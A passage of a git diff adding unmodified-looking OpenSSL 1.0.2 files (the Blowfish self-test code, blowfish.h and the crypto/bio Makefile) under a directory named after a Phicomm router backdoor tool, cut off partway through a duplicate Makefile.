+        printf("%02X", key_data[j]);
+    printf("\n");
+    for (i = 0; i < KEY_TEST_NUM - 1; i++) {
+        printf("c=");
+        for (j = 0; j < 8; j++)
+            printf("%02X", key_out[i][j]);
+        printf(" k[%2u]=", i + 1);
+        for (j = 0; j < i + 1; j++)
+            printf("%02X", key_test[j]);
+        printf("\n");
+    }
+
+    printf("\nchaining mode test data\n");
+    printf("key[16]   = ");
+    for (j = 0; j < 16; j++)
+        printf("%02X", cbc_key[j]);
+    printf("\niv[8]     = ");
+    for (j = 0; j < 8; j++)
+        printf("%02X", cbc_iv[j]);
+    printf("\ndata[%d]  = '%s'", (int)strlen(cbc_data) + 1, cbc_data);
+    printf("\ndata[%d]  = ", (int)strlen(cbc_data) + 1);
+    for (j = 0; j < strlen(cbc_data) + 1; j++)
+        printf("%02X", cbc_data[j]);
+    printf("\n");
+    printf("cbc cipher text\n");
+    printf("cipher[%d]= ", 32);
+    for (j = 0; j < 32; j++)
+        printf("%02X", cbc_ok[j]);
+    printf("\n");
+
+    printf("cfb64 cipher text\n");
+    printf("cipher[%d]= ", (int)strlen(cbc_data) + 1);
+    for (j = 0; j < strlen(cbc_data) + 1; j++)
+        printf("%02X", cfb64_ok[j]);
+    printf("\n");
+
+    printf("ofb64 cipher text\n");
+    printf("cipher[%d]= ", (int)strlen(cbc_data) + 1);
+    for (j = 0; j < strlen(cbc_data) + 1; j++)
+        printf("%02X", ofb64_ok[j]);
+    printf("\n");
+    return (0);
+}
+
+static int test(void)
+{
+    unsigned char cbc_in[40], cbc_out[40], iv[8];
+    int i, n, err = 0;
+    BF_KEY key;
+    BF_LONG data[2];
+    unsigned char out[8];
+    BF_LONG len;
+
+# ifdef CHARSET_EBCDIC
+    ebcdic2ascii(cbc_data, cbc_data, strlen(cbc_data));
+# endif
+
+    printf("testing blowfish in raw ecb mode\n");
+    for (n = 0; n < 2; n++) {
+# ifdef CHARSET_EBCDIC
+        ebcdic2ascii(bf_key[n], bf_key[n], strlen(bf_key[n]));
+# endif
+        BF_set_key(&key, strlen(bf_key[n]), (unsigned char *)bf_key[n]);
+
+        data[0] = bf_plain[n][0];
+        data[1] = bf_plain[n][1];
+        BF_encrypt(data, &key);
+        if (memcmp(&(bf_cipher[n][0]), &(data[0]), 8) != 0) {
+            printf("BF_encrypt error encrypting\n");
+            printf("got     :");
+            for (i = 0; i < 2; i++)
+                printf("%08lX ", (unsigned long)data[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 2; i++)
+                printf("%08lX ", (unsigned long)bf_cipher[n][i]);
+            err = 1;
+            printf("\n");
+        }
+
+        BF_decrypt(&(data[0]), &key);
+        if (memcmp(&(bf_plain[n][0]), &(data[0]), 8) != 0) {
+            printf("BF_encrypt error decrypting\n");
+            printf("got     :");
+            for (i = 0; i < 2; i++)
+                printf("%08lX ", (unsigned long)data[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 2; i++)
+                printf("%08lX ", (unsigned long)bf_plain[n][i]);
+            printf("\n");
+            err = 1;
+        }
+    }
+
+    printf("testing blowfish in ecb mode\n");
+
+    for (n = 0; n < NUM_TESTS; n++) {
+        BF_set_key(&key, 8, ecb_data[n]);
+
+        BF_ecb_encrypt(&(plain_data[n][0]), out, &key, BF_ENCRYPT);
+        if (memcmp(&(cipher_data[n][0]), out, 8) != 0) {
+            printf("BF_ecb_encrypt blowfish error encrypting\n");
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", out[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", cipher_data[n][i]);
+            err = 1;
+            printf("\n");
+        }
+
+        BF_ecb_encrypt(out, out, &key, BF_DECRYPT);
+        if (memcmp(&(plain_data[n][0]), out, 8) != 0) {
+            printf("BF_ecb_encrypt error decrypting\n");
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", out[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", plain_data[n][i]);
+            printf("\n");
+            err = 1;
+        }
+    }
+
+    printf("testing blowfish set_key\n");
+    for (n = 1; n < KEY_TEST_NUM; n++) {
+        BF_set_key(&key, n, key_test);
+        BF_ecb_encrypt(key_data, out, &key, BF_ENCRYPT);
+        /* mips-sgi-irix6.5-gcc  vv  -mabi=64 bug workaround */
+        if (memcmp(out, &(key_out[i = n - 1][0]), 8) != 0) {
+            printf("blowfish setkey error\n");
+            err = 1;
+        }
+    }
+
+    printf("testing blowfish in cbc mode\n");
+    len = strlen(cbc_data) + 1;
+
+    BF_set_key(&key, 16, cbc_key);
+    memset(cbc_in, 0, sizeof cbc_in);
+    memset(cbc_out, 0, sizeof cbc_out);
+    memcpy(iv, cbc_iv, sizeof iv);
+    BF_cbc_encrypt((unsigned char *)cbc_data, cbc_out, len,
+                   &key, iv, BF_ENCRYPT);
+    if (memcmp(cbc_out, cbc_ok, 32) != 0) {
+        err = 1;
+        printf("BF_cbc_encrypt encrypt error\n");
+        for (i = 0; i < 32; i++)
+            printf("0x%02X,", cbc_out[i]);
+    }
+    memcpy(iv, cbc_iv, 8);
+    BF_cbc_encrypt(cbc_out, cbc_in, len, &key, iv, BF_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, strlen(cbc_data) + 1) != 0) {
+        printf("BF_cbc_encrypt decrypt error\n");
+        err = 1;
+    }
+
+    printf("testing blowfish in cfb64 mode\n");
+
+    BF_set_key(&key, 16, cbc_key);
+    memset(cbc_in, 0, 40);
+    memset(cbc_out, 0, 40);
+    memcpy(iv, cbc_iv, 8);
+    n = 0;
+    BF_cfb64_encrypt((unsigned char *)cbc_data, cbc_out, (long)13,
+                     &key, iv, &n, BF_ENCRYPT);
+    BF_cfb64_encrypt((unsigned char *)&(cbc_data[13]), &(cbc_out[13]),
+                     len - 13, &key, iv, &n, BF_ENCRYPT);
+    if (memcmp(cbc_out, cfb64_ok, (int)len) != 0) {
+        err = 1;
+        printf("BF_cfb64_encrypt encrypt error\n");
+        for (i = 0; i < (int)len; i++)
+            printf("0x%02X,", cbc_out[i]);
+    }
+    n = 0;
+    memcpy(iv, cbc_iv, 8);
+    BF_cfb64_encrypt(cbc_out, cbc_in, 17, &key, iv, &n, BF_DECRYPT);
+    BF_cfb64_encrypt(&(cbc_out[17]), &(cbc_in[17]), len - 17,
+                     &key, iv, &n, BF_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, (int)len) != 0) {
+        printf("BF_cfb64_encrypt decrypt error\n");
+        err = 1;
+    }
+
+    printf("testing blowfish in ofb64\n");
+
+    BF_set_key(&key, 16, cbc_key);
+    memset(cbc_in, 0, 40);
+    memset(cbc_out, 0, 40);
+    memcpy(iv, cbc_iv, 8);
+    n = 0;
+    BF_ofb64_encrypt((unsigned char *)cbc_data, cbc_out, (long)13, &key, iv,
+                     &n);
+    BF_ofb64_encrypt((unsigned char *)&(cbc_data[13]), &(cbc_out[13]),
+                     len - 13, &key, iv, &n);
+    if (memcmp(cbc_out, ofb64_ok, (int)len) != 0) {
+        err = 1;
+        printf("BF_ofb64_encrypt encrypt error\n");
+        for (i = 0; i < (int)len; i++)
+            printf("0x%02X,", cbc_out[i]);
+    }
+    n = 0;
+    memcpy(iv, cbc_iv, 8);
+    BF_ofb64_encrypt(cbc_out, cbc_in, 17, &key, iv, &n);
+    BF_ofb64_encrypt(&(cbc_out[17]), &(cbc_in[17]), len - 17, &key, iv, &n);
+    if (memcmp(cbc_in, cbc_data, (int)len) != 0) {
+        printf("BF_ofb64_encrypt decrypt error\n");
+        err = 1;
+    }
+
+    return (err);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/blowfish.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/blowfish.h
new file mode 100644
index 0000000..8329302
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/blowfish.h
@@ -0,0 +1,130 @@
+/* crypto/bf/blowfish.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_BLOWFISH_H
+# define HEADER_BLOWFISH_H
+
+# include <openssl/e_os2.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_NO_BF
+#  error BF is disabled.
+# endif
+
+# define BF_ENCRYPT      1
+# define BF_DECRYPT      0
+
+/*-
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ * ! BF_LONG has to be at least 32 bits wide. If it's wider, then !
+ * ! BF_LONG_LOG2 has to be defined along.                        !
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ */
+
+# if defined(__LP32__)
+#  define BF_LONG unsigned long
+# elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__)
+#  define BF_LONG unsigned long
+#  define BF_LONG_LOG2 3
+/*
+ * _CRAY note. I could declare short, but I have no idea what impact
+ * does it have on performance on none-T3E machines. I could declare
+ * int, but at least on C90 sizeof(int) can be chosen at compile time.
+ * So I've chosen long...
+ *                                      <appro@fy.chalmers.se>
+ */
+# else
+#  define BF_LONG unsigned int
+# endif
+
+# define BF_ROUNDS       16
+# define BF_BLOCK        8
+
+typedef struct bf_key_st {
+    BF_LONG P[BF_ROUNDS + 2];
+    BF_LONG S[4 * 256];
+} BF_KEY;
+
+# ifdef OPENSSL_FIPS
+void private_BF_set_key(BF_KEY *key, int len, const unsigned char *data);
+# endif
+void BF_set_key(BF_KEY *key, int len, const unsigned char *data);
+
+void BF_encrypt(BF_LONG *data, const BF_KEY *key);
+void BF_decrypt(BF_LONG *data, const BF_KEY *key);
+
+void BF_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                    const BF_KEY *key, int enc);
+void BF_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
+                    const BF_KEY *schedule, unsigned char *ivec, int enc);
+void BF_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, const BF_KEY *schedule,
+                      unsigned char *ivec, int *num, int enc);
+void BF_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, const BF_KEY *schedule,
+                      unsigned char *ivec, int *num);
+const char *BF_options(void);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile
new file mode 100644
index 0000000..c395d80
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile
@@ -0,0 +1,222 @@
+#
+# OpenSSL/crypto/bio/Makefile
+#
+
+DIR=	bio
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= bio_lib.c bio_cb.c bio_err.c \
+	bss_mem.c bss_null.c bss_fd.c \
+	bss_file.c bss_sock.c bss_conn.c \
+	bf_null.c bf_buff.c b_print.c b_dump.c \
+	b_sock.c bss_acpt.c bf_nbio.c bss_log.c bss_bio.c \
+	bss_dgram.c
+#	bf_lbuf.c
+LIBOBJ= bio_lib.o bio_cb.o bio_err.o \
+	bss_mem.o bss_null.o bss_fd.o \
+	bss_file.o bss_sock.o bss_conn.o \
+	bf_null.o bf_buff.o b_print.o b_dump.o \
+	b_sock.o bss_acpt.o bf_nbio.o bss_log.o bss_bio.o \
+	bss_dgram.o
+#	bf_lbuf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= bio.h
+HEADER=	bio_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+b_dump.o: ../../e_os.h ../../include/openssl/bio.h
+b_dump.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_dump.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+b_dump.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+b_dump.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+b_dump.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+b_dump.o: ../../include/openssl/symhacks.h ../cryptlib.h b_dump.c bio_lcl.h
+b_print.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+b_print.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_print.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+b_print.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+b_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+b_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+b_print.o: ../../include/openssl/symhacks.h ../cryptlib.h b_print.c
+b_sock.o: ../../e_os.h ../../include/openssl/bio.h
+b_sock.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_sock.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+b_sock.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+b_sock.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+b_sock.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+b_sock.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+b_sock.o: ../cryptlib.h b_sock.c
+bf_buff.o: ../../e_os.h ../../include/openssl/bio.h
+bf_buff.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_buff.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_buff.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_buff.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_buff.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_buff.o: ../../include/openssl/symhacks.h ../cryptlib.h bf_buff.c
+bf_nbio.o: ../../e_os.h ../../include/openssl/bio.h
+bf_nbio.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_nbio.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_nbio.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_nbio.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_nbio.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bf_nbio.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bf_nbio.o: ../cryptlib.h bf_nbio.c
+bf_null.o: ../../e_os.h ../../include/openssl/bio.h
+bf_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_null.o: ../../include/openssl/symhacks.h ../cryptlib.h bf_null.c
+bio_cb.o: ../../e_os.h ../../include/openssl/bio.h
+bio_cb.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_cb.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_cb.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_cb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_cb.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_cb.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_cb.c
+bio_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+bio_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_err.o: ../../include/openssl/symhacks.h bio_err.c
+bio_lib.o: ../../e_os.h ../../include/openssl/bio.h
+bio_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lib.c
+bss_acpt.o: ../../e_os.h ../../include/openssl/bio.h
+bss_acpt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_acpt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_acpt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_acpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_acpt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_acpt.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_acpt.c
+bss_bio.o: ../../e_os.h ../../include/openssl/bio.h
+bss_bio.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bss_bio.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+bss_bio.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bss_bio.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bss_bio.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bss_bio.o: bss_bio.c
+bss_conn.o: ../../e_os.h ../../include/openssl/bio.h
+bss_conn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_conn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_conn.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_conn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_conn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_conn.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_conn.c
+bss_dgram.o: ../../e_os.h ../../include/openssl/bio.h
+bss_dgram.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_dgram.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_dgram.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_dgram.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_dgram.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_dgram.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_dgram.c
+bss_fd.o: ../../e_os.h ../../include/openssl/bio.h
+bss_fd.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_fd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_fd.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_fd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_fd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_fd.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lcl.h bss_fd.c
+bss_file.o: ../../e_os.h ../../include/openssl/bio.h
+bss_file.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_file.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_file.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_file.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_file.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_file.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lcl.h bss_file.c
+bss_log.o: ../../e_os.h ../../include/openssl/bio.h
+bss_log.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_log.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_log.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_log.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_log.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_log.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_log.c
+bss_mem.o: ../../e_os.h ../../include/openssl/bio.h
+bss_mem.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_mem.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_mem.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_mem.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_mem.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_mem.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_mem.c
+bss_null.o: ../../e_os.h ../../include/openssl/bio.h
+bss_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_null.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_null.c
+bss_sock.o: ../../e_os.h ../../include/openssl/bio.h
+bss_sock.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_sock.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_sock.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_sock.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_sock.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_sock.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_sock.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile.bak
new file mode 100644
index 0000000..c395d80
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile.bak
@@ -0,0 +1,222 @@
+#
+# OpenSSL/crypto/bio/Makefile
+#
+
+DIR=	bio
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= bio_lib.c bio_cb.c bio_err.c \
+	bss_mem.c bss_null.c bss_fd.c \
+	bss_file.c bss_sock.c bss_conn.c \
+	bf_null.c bf_buff.c b_print.c b_dump.c \
+	b_sock.c bss_acpt.c bf_nbio.c bss_log.c bss_bio.c \
+	bss_dgram.c
+#	bf_lbuf.c
+LIBOBJ= bio_lib.o bio_cb.o bio_err.o \
+	bss_mem.o bss_null.o bss_fd.o \
+	bss_file.o bss_sock.o bss_conn.o \
+	bf_null.o bf_buff.o b_print.o b_dump.o \
+	b_sock.o bss_acpt.o bf_nbio.o bss_log.o bss_bio.o \
+	bss_dgram.o
+#	bf_lbuf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= bio.h
+HEADER=	bio_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
